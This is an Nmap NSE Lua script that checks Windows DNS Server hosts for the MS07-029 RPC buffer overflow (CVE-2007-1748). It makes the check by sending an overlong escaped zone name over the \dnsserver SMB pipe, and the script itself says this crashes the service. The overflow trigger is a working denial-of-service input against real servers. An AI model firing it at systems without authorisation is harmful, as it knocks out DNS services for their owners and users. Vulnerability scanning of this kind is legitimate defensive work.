local msrpc = require "msrpc"
local nmap = require "nmap"
local smb = require "smb"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local vulns = require "vulns"
description = [[
Detects Microsoft Windows systems with Dns Server RPC vulnerable to MS07-029.
MS07-029 targets the R_DnssrvQuery()
and R_DnssrvQuery2()
RPC method which isa part of DNS Server RPC interface that serves as a RPC service
for configuring and getting information from the DNS Server service.
DNS Server RPC service can be accessed using "\dnsserver" SMB named pipe.
The vulnerability is triggered when a long string is send as the "zone" parameter
which causes the buffer overflow which crashes the service.
This check was previously part of smb-check-vulns.
]]
---
--@usage
-- nmap --script smb-vuln-ms07-029.nse -p445
-- nmap -sU --script smb-vuln-ms07-029.nse -p U:137,T:139
--
--@output
--Host script results:
--| smb-vuln-ms07-029:
--| VULNERABLE:
--| Windows DNS RPC Interface Could Allow Remote Code Execution (MS07-029)
--| State: VULNERABLE
--| IDs: CVE:CVE-2007-1748
--| A stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in
--| Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to
--| execute arbitrary code via a long zone name containing character constants represented by escape sequences.
--|
--| Disclosure date: 2007-06-06
--| References:
--| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1748
--|_ https://technet.microsoft.com/en-us/library/security/ms07-029.aspx
---
author = {"Ron Bowes", "Jiayi Ye", "Paulino Calderon "}
copyright = "Ron Bowes"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"intrusive","exploit","dos","vuln"}
-- run after all smb-* scripts (so if it DOES crash something, it doesn't kill
-- other scans have had a chance to run)
dependencies = {
"smb-brute", "smb-enum-sessions", "smb-security-mode",
"smb-enum-shares", "smb-server-stats",
"smb-enum-domains", "smb-enum-users", "smb-system-info",
"smb-enum-groups", "smb-os-discovery", "smb-enum-processes",
"smb-psexec",
};
hostrule = function(host)
return smb.get_port(host) ~= nil
end
local VULNERABLE = 1
local PATCHED = 2
local UNKNOWN = 3
local NOTUP = 8
---Check the existence of ms07_029 vulnerability in Microsoft Dns Server service.
--This check is not safe as it crashes the Dns Server RPC service its dependencies.
--@param host Host object.
--@return (status, result)
--* status == false
-> result == NOTUP
which designates
--that the targeted Dns Server RPC service is not active.
--* status == true
->
-- ** result == VULNERABLE
for vulnerable.
-- ** result == PATCHED
for not vulnerable.
function check_ms07_029(host)
--create the SMB session
local status, smbstate
status, smbstate = msrpc.start_smb(host, msrpc.DNSSERVER_PATH)
if(status == false) then
stdnse.debug1("check_ms07_029: Service is not active.")
return false, NOTUP --if not accessible across pipe then the service is inactive
end
--bind to DNSSERVER service
local bind_result
status, bind_result = msrpc.bind(smbstate, msrpc.DNSSERVER_UUID, msrpc.DNSSERVER_VERSION)
if(status == false) then
stdnse.debug1("check_ms07_029: false")
msrpc.stop_smb(smbstate)
return false, UNKNOWN --if bind operation results with a false status we can't conclude anything.
end
--call
local req_blob, q_result
status, q_result = msrpc.DNSSERVER_Query(
smbstate,
"VULNSRV",
string.rep("\\\13", 1000),
1)--any op num will do
--sanity check
msrpc.stop_smb(smbstate)
if(status == false) then
stdnse.debug1("check_ms07_029: DNSSERVER_Query failed")
if(q_result == "NT_STATUS_PIPE_BROKEN") then
return true, VULNERABLE
else
return true, PATCHED
end
else
return true, PATCHED
end
end
action = function(host)
local status, result, message
local response = {}
local vuln_report = vulns.Report:new(SCRIPT_NAME, host)
local vuln_table = {
title = 'Windows DNS RPC Interface Could Allow Remote Code Execution (MS07-029)',
state = vulns.STATE.NOT_VULN,
description = [[
A stack-based buffer overflow in the RPC interface in the Domain Name System (DNS) Server Service in
Microsoft Windows 2000 Server SP 4, Server 2003 SP 1, and Server 2003 SP 2 allows remote attackers to
execute arbitrary code via a long zone name containing character constants represented by escape sequences.
]],
IDS = {CVE = 'CVE-2007-1748'},
references = {
'https://technet.microsoft.com/en-us/library/security/ms07-029.aspx'
},
dates = {
disclosure = {year = '2007', month = '06', day = '06'},
}
}
-- Check for ms07-029
status, result = check_ms07_029(host)
if(status == false) then
if(result == NOTUP) then
vuln_table.extra_info = "Service is not active."
vuln_table.state = vulns.STATE.NOT_VULN
else
vuln_table.state = vulns.STATE.NOT_VULN
end
else
if(result == VULNERABLE) then
vuln_table.state = vulns.STATE.VULN
else
vuln_table.state = vulns.STATE.NOT_VULN
end
end
return vuln_report:make_output(vuln_table)
end